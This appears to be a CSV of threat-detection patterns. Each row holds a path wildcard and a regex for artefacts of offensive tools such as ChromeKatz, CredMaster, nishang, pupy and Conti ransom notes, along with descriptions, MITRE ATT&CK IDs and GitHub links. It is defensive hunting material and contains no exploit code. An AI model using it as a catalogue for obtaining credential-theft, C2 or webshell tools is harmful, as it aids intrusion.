"*\confuserex.py*",".{0,1000}\\confuserex\.py.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","packer bundled","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","14609" "*\ConfuserEx\*",".{0,1000}\\ConfuserEx\\.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","N/A","6","10","3629","1661","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z","14610" "*\ConfuserEx\Obfuscated.exe*",".{0,1000}\\ConfuserEx\\Obfuscated\.exe.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","14611" "*\ConfuserEx_bin.zip*",".{0,1000}\\ConfuserEx_bin\.zip.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","N/A","6","10","3629","1661","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z","14612" 
"*\consentfox.dll*",".{0,1000}\\consentfox\.dll.{0,1000}","offensive_tool_keyword","ThievingFox","collection of post-exploitation tools to gather credentials from various password managers","T1555 - T1003 - T1056 - T1070","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Slowerzs/ThievingFox","1","0","N/A","N/A","10","6","535","65","2024-03-28T19:58:03Z","2024-01-20T23:22:52Z","14615" "*\conti1.txt*",".{0,1000}\\conti1\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","14618" "*\conti2.txt*",".{0,1000}\\conti2\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","14619" "*\conti3.txt*",".{0,1000}\\conti3\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","14620" "*\conti4.txt*",".{0,1000}\\conti4\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","14621" "*\ConvertFrom-JWTtoken.ps1*",".{0,1000}\\ConvertFrom\-JWTtoken\.ps1.{0,1000}","offensive_tool_keyword","TokenTacticsV2","fork of the great TokenTactics with support for CAE and token endpoint 
v2","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/f-bader/TokenTacticsV2","1","0","N/A","N/A","6","3","282","38","2025-02-25T14:14:25Z","2022-08-16T17:00:45Z","14627" "*\Convert-ROT47.ps1*",".{0,1000}\\Convert\-ROT47\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","14628" "*\ConvertToShellcode.py*",".{0,1000}\\ConvertToShellcode\.py.{0,1000}","offensive_tool_keyword","NamelessC2","A C2 with all its components written in Rust","T1102 - T1573.001 - T1027 - T1219 - T1205","TA0011 - TA0003 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/trickster0/NamelessC2","1","0","N/A","N/A","10","10","266","33","2024-09-26T21:21:20Z","2024-09-26T21:06:37Z","14629" "*\CookieData.txt --all*",".{0,1000}\\CookieData\.txt\s\-\-all.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","N/A","N/A","10","10","1132","128","2025-04-10T13:48:00Z","2022-06-28T00:00:28Z","14630" "*\CookieHijack.ps1*",".{0,1000}\\CookieHijack\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration 
tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","14631" "*\CookieKatz.vcxproj*",".{0,1000}\\CookieKatz\.vcxproj.{0,1000}","offensive_tool_keyword","ChromeKatz","Dump cookies directly from Chrome process memory","T1555.003 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Meckazin/ChromeKatz","1","0","N/A","N/A","10","10","1171","115","2024-11-26T12:53:22Z","2023-12-07T22:27:06Z","14632" "*\CookieKatz-BOF\*",".{0,1000}\\CookieKatz\-BOF\\.{0,1000}","offensive_tool_keyword","ChromeKatz","Dump cookies directly from Chrome process memory","T1555.003 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Meckazin/ChromeKatz","1","0","N/A","N/A","10","10","1171","115","2024-11-26T12:53:22Z","2023-12-07T22:27:06Z","14633" "*\CookieKatzMinidump\*",".{0,1000}\\CookieKatzMinidump\\.{0,1000}","offensive_tool_keyword","ChromeKatz","Dump cookies directly from Chrome process memory","T1555.003 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Meckazin/ChromeKatz","1","0","N/A","N/A","10","10","1171","115","2024-11-26T12:53:22Z","2023-12-07T22:27:06Z","14634" "*\Coolvibes.exe*",".{0,1000}\\Coolvibes\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - 
TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","14635" "*\Cooolis-ms-Loader\*",".{0,1000}\\Cooolis\-ms\-Loader\\.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","0","N/A","N/A","10","10","916","138","2024-08-12T13:07:54Z","2019-03-31T14:23:57Z","14636" "*\CopyItemCommand.cs",".{0,1000}\\CopyItemCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. 
An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","14637" "*\Copy-VSS.ps1*",".{0,1000}\\Copy\-VSS\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","0","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","14638" "*\Coringa-RAT 0.1.exe*",".{0,1000}\\Coringa\-RAT\s0\.1\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","14639" "*\CORINGA-RAT.exe*",".{0,1000}\\CORINGA\-RAT\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","14640" 
"*\Corrupt_AMSI.py*",".{0,1000}\\Corrupt_AMSI\.py.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","0","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","14641" "*\Corrupt_AMSI.vba*",".{0,1000}\\Corrupt_AMSI\.vba.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","0","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","14642" "*\CppWSManWinRM.exe*",".{0,1000}\\CppWSManWinRM\.exe.{0,1000}","offensive_tool_keyword","WSMan-WinRM","remote commands over WinRM using the WSMan.Automation COM object","T1021.004 - T1059.001","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/bohops/WSMan-WinRM","1","0","N/A","N/A","10","3","236","40","2020-05-12T16:49:01Z","2020-05-12T01:30:42Z","14643" "*\crackmapexecwin*",".{0,1000}\\crackmapexecwin.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","14644" "*\cradle.ps1*",".{0,1000}\\cradle\.ps1.{0,1000}","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/Metro-Holografix/DInjector","1","0","N/A","private github repo","8","","N/A","","","","14645" "*\cradle.ps1*",".{0,1000}\\cradle\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. 
Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","0","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","14646" "*\Crassus-main*",".{0,1000}\\Crassus\-main.{0,1000}","offensive_tool_keyword","Crassus","Crassus Windows privilege escalation discovery tool","T1068 - T1003 - T1003.003 - T1046","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/vu-ls/Crassus","1","0","N/A","N/A","10","6","571","59","2024-11-08T14:11:39Z","2023-01-12T21:01:52Z","14647" "*\CrazyMouse.exe*",".{0,1000}\\CrazyMouse\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","14648" "*\create_webshell_with_py.py*",".{0,1000}\\create_webshell_with_py\.py.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","14649" "*\Create-HotKeyLNK.ps1*",".{0,1000}\\Create\-HotKeyLNK\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - 
TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","14650" "*\Create-MultipleSessions.ps1*",".{0,1000}\\Create\-MultipleSessions\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","0","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","14651" "*\CreateService-master\*",".{0,1000}\\CreateService\-master\\.{0,1000}","offensive_tool_keyword","CreateService","Creating a persistent service","T1543.003 - T1547.001 - T1050","TA0003","N/A","N/A","Persistence","https://github.com/uknowsec/CreateService","1","0","N/A","N/A","4","2","105","27","2021-04-26T06:43:12Z","2020-09-23T05:03:52Z","14653" "*\CreateService-master\CreateService\*",".{0,1000}\\CreateService\-master\\CreateService\\.{0,1000}","offensive_tool_keyword","CreateService","Creating a persistent service","T1543.003 - T1547.001 - T1050","TA0003","N/A","N/A","Persistence","https://github.com/uknowsec/CreateService","1","0","N/A","N/A","4","2","105","27","2021-04-26T06:43:12Z","2020-09-23T05:03:52Z","14654" "*\CreateTokenVariant.exe*",".{0,1000}\\CreateTokenVariant\.exe.{0,1000}","offensive_tool_keyword","PrivFu","get SYSTEM integrity level by abusing arbitrary kernel write vulnerability and token privileges","T1068 - T1134 - T1134.001 - T1078 - T1059","TA0004 - TA0009 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","N/A","KernelWritePoCs","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","14655" 
"*\creddump.py*",".{0,1000}\\creddump\.py.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","14656" "*\creddump7-master*",".{0,1000}\\creddump7\-master.{0,1000}","offensive_tool_keyword","creddump7","extracts various forms of credentials from Windows systems","T1003 - T1081 - T1040 - T1110 - T1555","TA0006 - TA0009","N/A","Sandworm","Credential Access","https://github.com/CiscoCXSecurity/creddump7","1","0","N/A","N/A","10","4","394","106","2020-10-02T13:25:16Z","2014-06-24T13:18:38Z","14657" "*\credential access.cna*",".{0,1000}\\credential\saccess\.cna.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation 
tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","14658" "*\credentials.log*",".{0,1000}\\credentials\.log.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","14660" "*\CredHistView.cfg*",".{0,1000}\\CredHistView\.cfg.{0,1000}","offensive_tool_keyword","credhistview","This tool allows you to decrypt the CREDHIST file and view the SHA1 and NTLM hashes of all previous passwords you used on your system","T1003 - T1081 - T1110","TA0006 - TA0009","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/credhist_view.html","1","0","N/A","N/A","9","9","N/A","N/A","N/A","N/A","14661" "*\credhistview.lnk*",".{0,1000}\\credhistview\.lnk.{0,1000}","offensive_tool_keyword","credhistview","This tool allows you to decrypt the CREDHIST file and view the SHA1 and NTLM hashes of all previous passwords you used on your system","T1003 - T1081 - T1110","TA0006 - TA0009","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/credhist_view.html","1","0","N/A","N/A","9","9","N/A","N/A","N/A","N/A","14662" "*\credhistview\*",".{0,1000}\\credhistview\\.{0,1000}","offensive_tool_keyword","credhistview","This tool allows you to decrypt the CREDHIST file and view the SHA1 and NTLM hashes of all previous passwords you used on your 
system","T1003 - T1081 - T1110","TA0006 - TA0009","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/credhist_view.html","1","0","N/A","N/A","9","9","N/A","N/A","N/A","N/A","14663" "*\creditcards.py*",".{0,1000}\\creditcards\.py.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tool","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","N/A","can be used for data exfiltration simulation","8","7","647","144","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z","14664" "*\credmaster.py*",".{0,1000}\\credmaster\.py.{0,1000}","offensive_tool_keyword","CredMaster","CredKing password spraying tool - uses FireProx APIs to rotate IP addresses","T1110.003 - T1596 - T1071.004 - T1621","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/knavesec/CredMaster","1","0","N/A","N/A","9","10","1070","142","2025-03-19T20:36:21Z","2020-09-25T20:57:42Z","14665" "*\credmaster.txt*",".{0,1000}\\credmaster\.txt.{0,1000}","offensive_tool_keyword","CredMaster","CredKing password spraying tool - uses FireProx APIs to rotate IP addresses","T1110.003 - T1596 - T1071.004 - T1621","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/knavesec/CredMaster","1","0","N/A","N/A","9","10","1070","142","2025-03-19T20:36:21Z","2020-09-25T20:57:42Z","14666" "*\CredMaster-master.zip*",".{0,1000}\\CredMaster\-master\.zip.{0,1000}","offensive_tool_keyword","CredMaster","CredKing password spraying tool - uses FireProx APIs to rotate IP addresses","T1110.003 - T1596 - T1071.004 - T1621","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/knavesec/CredMaster","1","0","N/A","N/A","9","10","1070","142","2025-03-19T20:36:21Z","2020-09-25T20:57:42Z","14667" 
"*\credmaster-success.txt*",".{0,1000}\\credmaster\-success\.txt.{0,1000}","offensive_tool_keyword","CredMaster","CredKing password spraying tool - uses FireProx APIs to rotate IP addresses","T1110.003 - T1596 - T1071.004 - T1621","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/knavesec/CredMaster","1","0","N/A","N/A","9","10","1070","142","2025-03-19T20:36:21Z","2020-09-25T20:57:42Z","14668" "*\credmaster-validusers.txt*",".{0,1000}\\credmaster\-validusers\.txt.{0,1000}","offensive_tool_keyword","CredMaster","CredKing password spraying tool - uses FireProx APIs to rotate IP addresses","T1110.003 - T1596 - T1071.004 - T1621","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/knavesec/CredMaster","1","0","N/A","N/A","9","10","1070","142","2025-03-19T20:36:21Z","2020-09-25T20:57:42Z","14669" "*\CredPhisher.exe*",".{0,1000}\\CredPhisher\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","14670" "*\CredPhisher.exe*",".{0,1000}\\CredPhisher\.exe.{0,1000}","offensive_tool_keyword","Credphisher","prompt a user for credentials using a Windows credential dialog","T1056.002 - T1003 ","TA0006","N/A","N/A","Credential 
Access","https://github.com/ryanmrestivo/red-team/blob/1e53b7aa77717a22c9bd54facc64155a9a4c49fc/Exploitation-Tools/OffensiveCSharp/CredPhisher","1","0","N/A","N/A","7","2","136","34","2024-10-18T12:12:38Z","2021-04-12T00:00:03Z","14671" "*\CredPhisher.pdb*",".{0,1000}\\CredPhisher\.pdb.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#content","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","14672" "*\CredPhisher.pdb*",".{0,1000}\\CredPhisher\.pdb.{0,1000}","offensive_tool_keyword","Credphisher","prompt a user for credentials using a Windows credential dialog","T1056.002 - T1003 ","TA0006","N/A","N/A","Credential Access","https://github.com/ryanmrestivo/red-team/blob/1e53b7aa77717a22c9bd54facc64155a9a4c49fc/Exploitation-Tools/OffensiveCSharp/CredPhisher","1","0","#content","N/A","7","2","136","34","2024-10-18T12:12:38Z","2021-04-12T00:00:03Z","14673" "*\CredsPhish.log*",".{0,1000}\\CredsPhish\.log.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","0","#logfile","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","14674" "*\CriticalBreachDetected.txt*",".{0,1000}\\CriticalBreachDetected\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection 
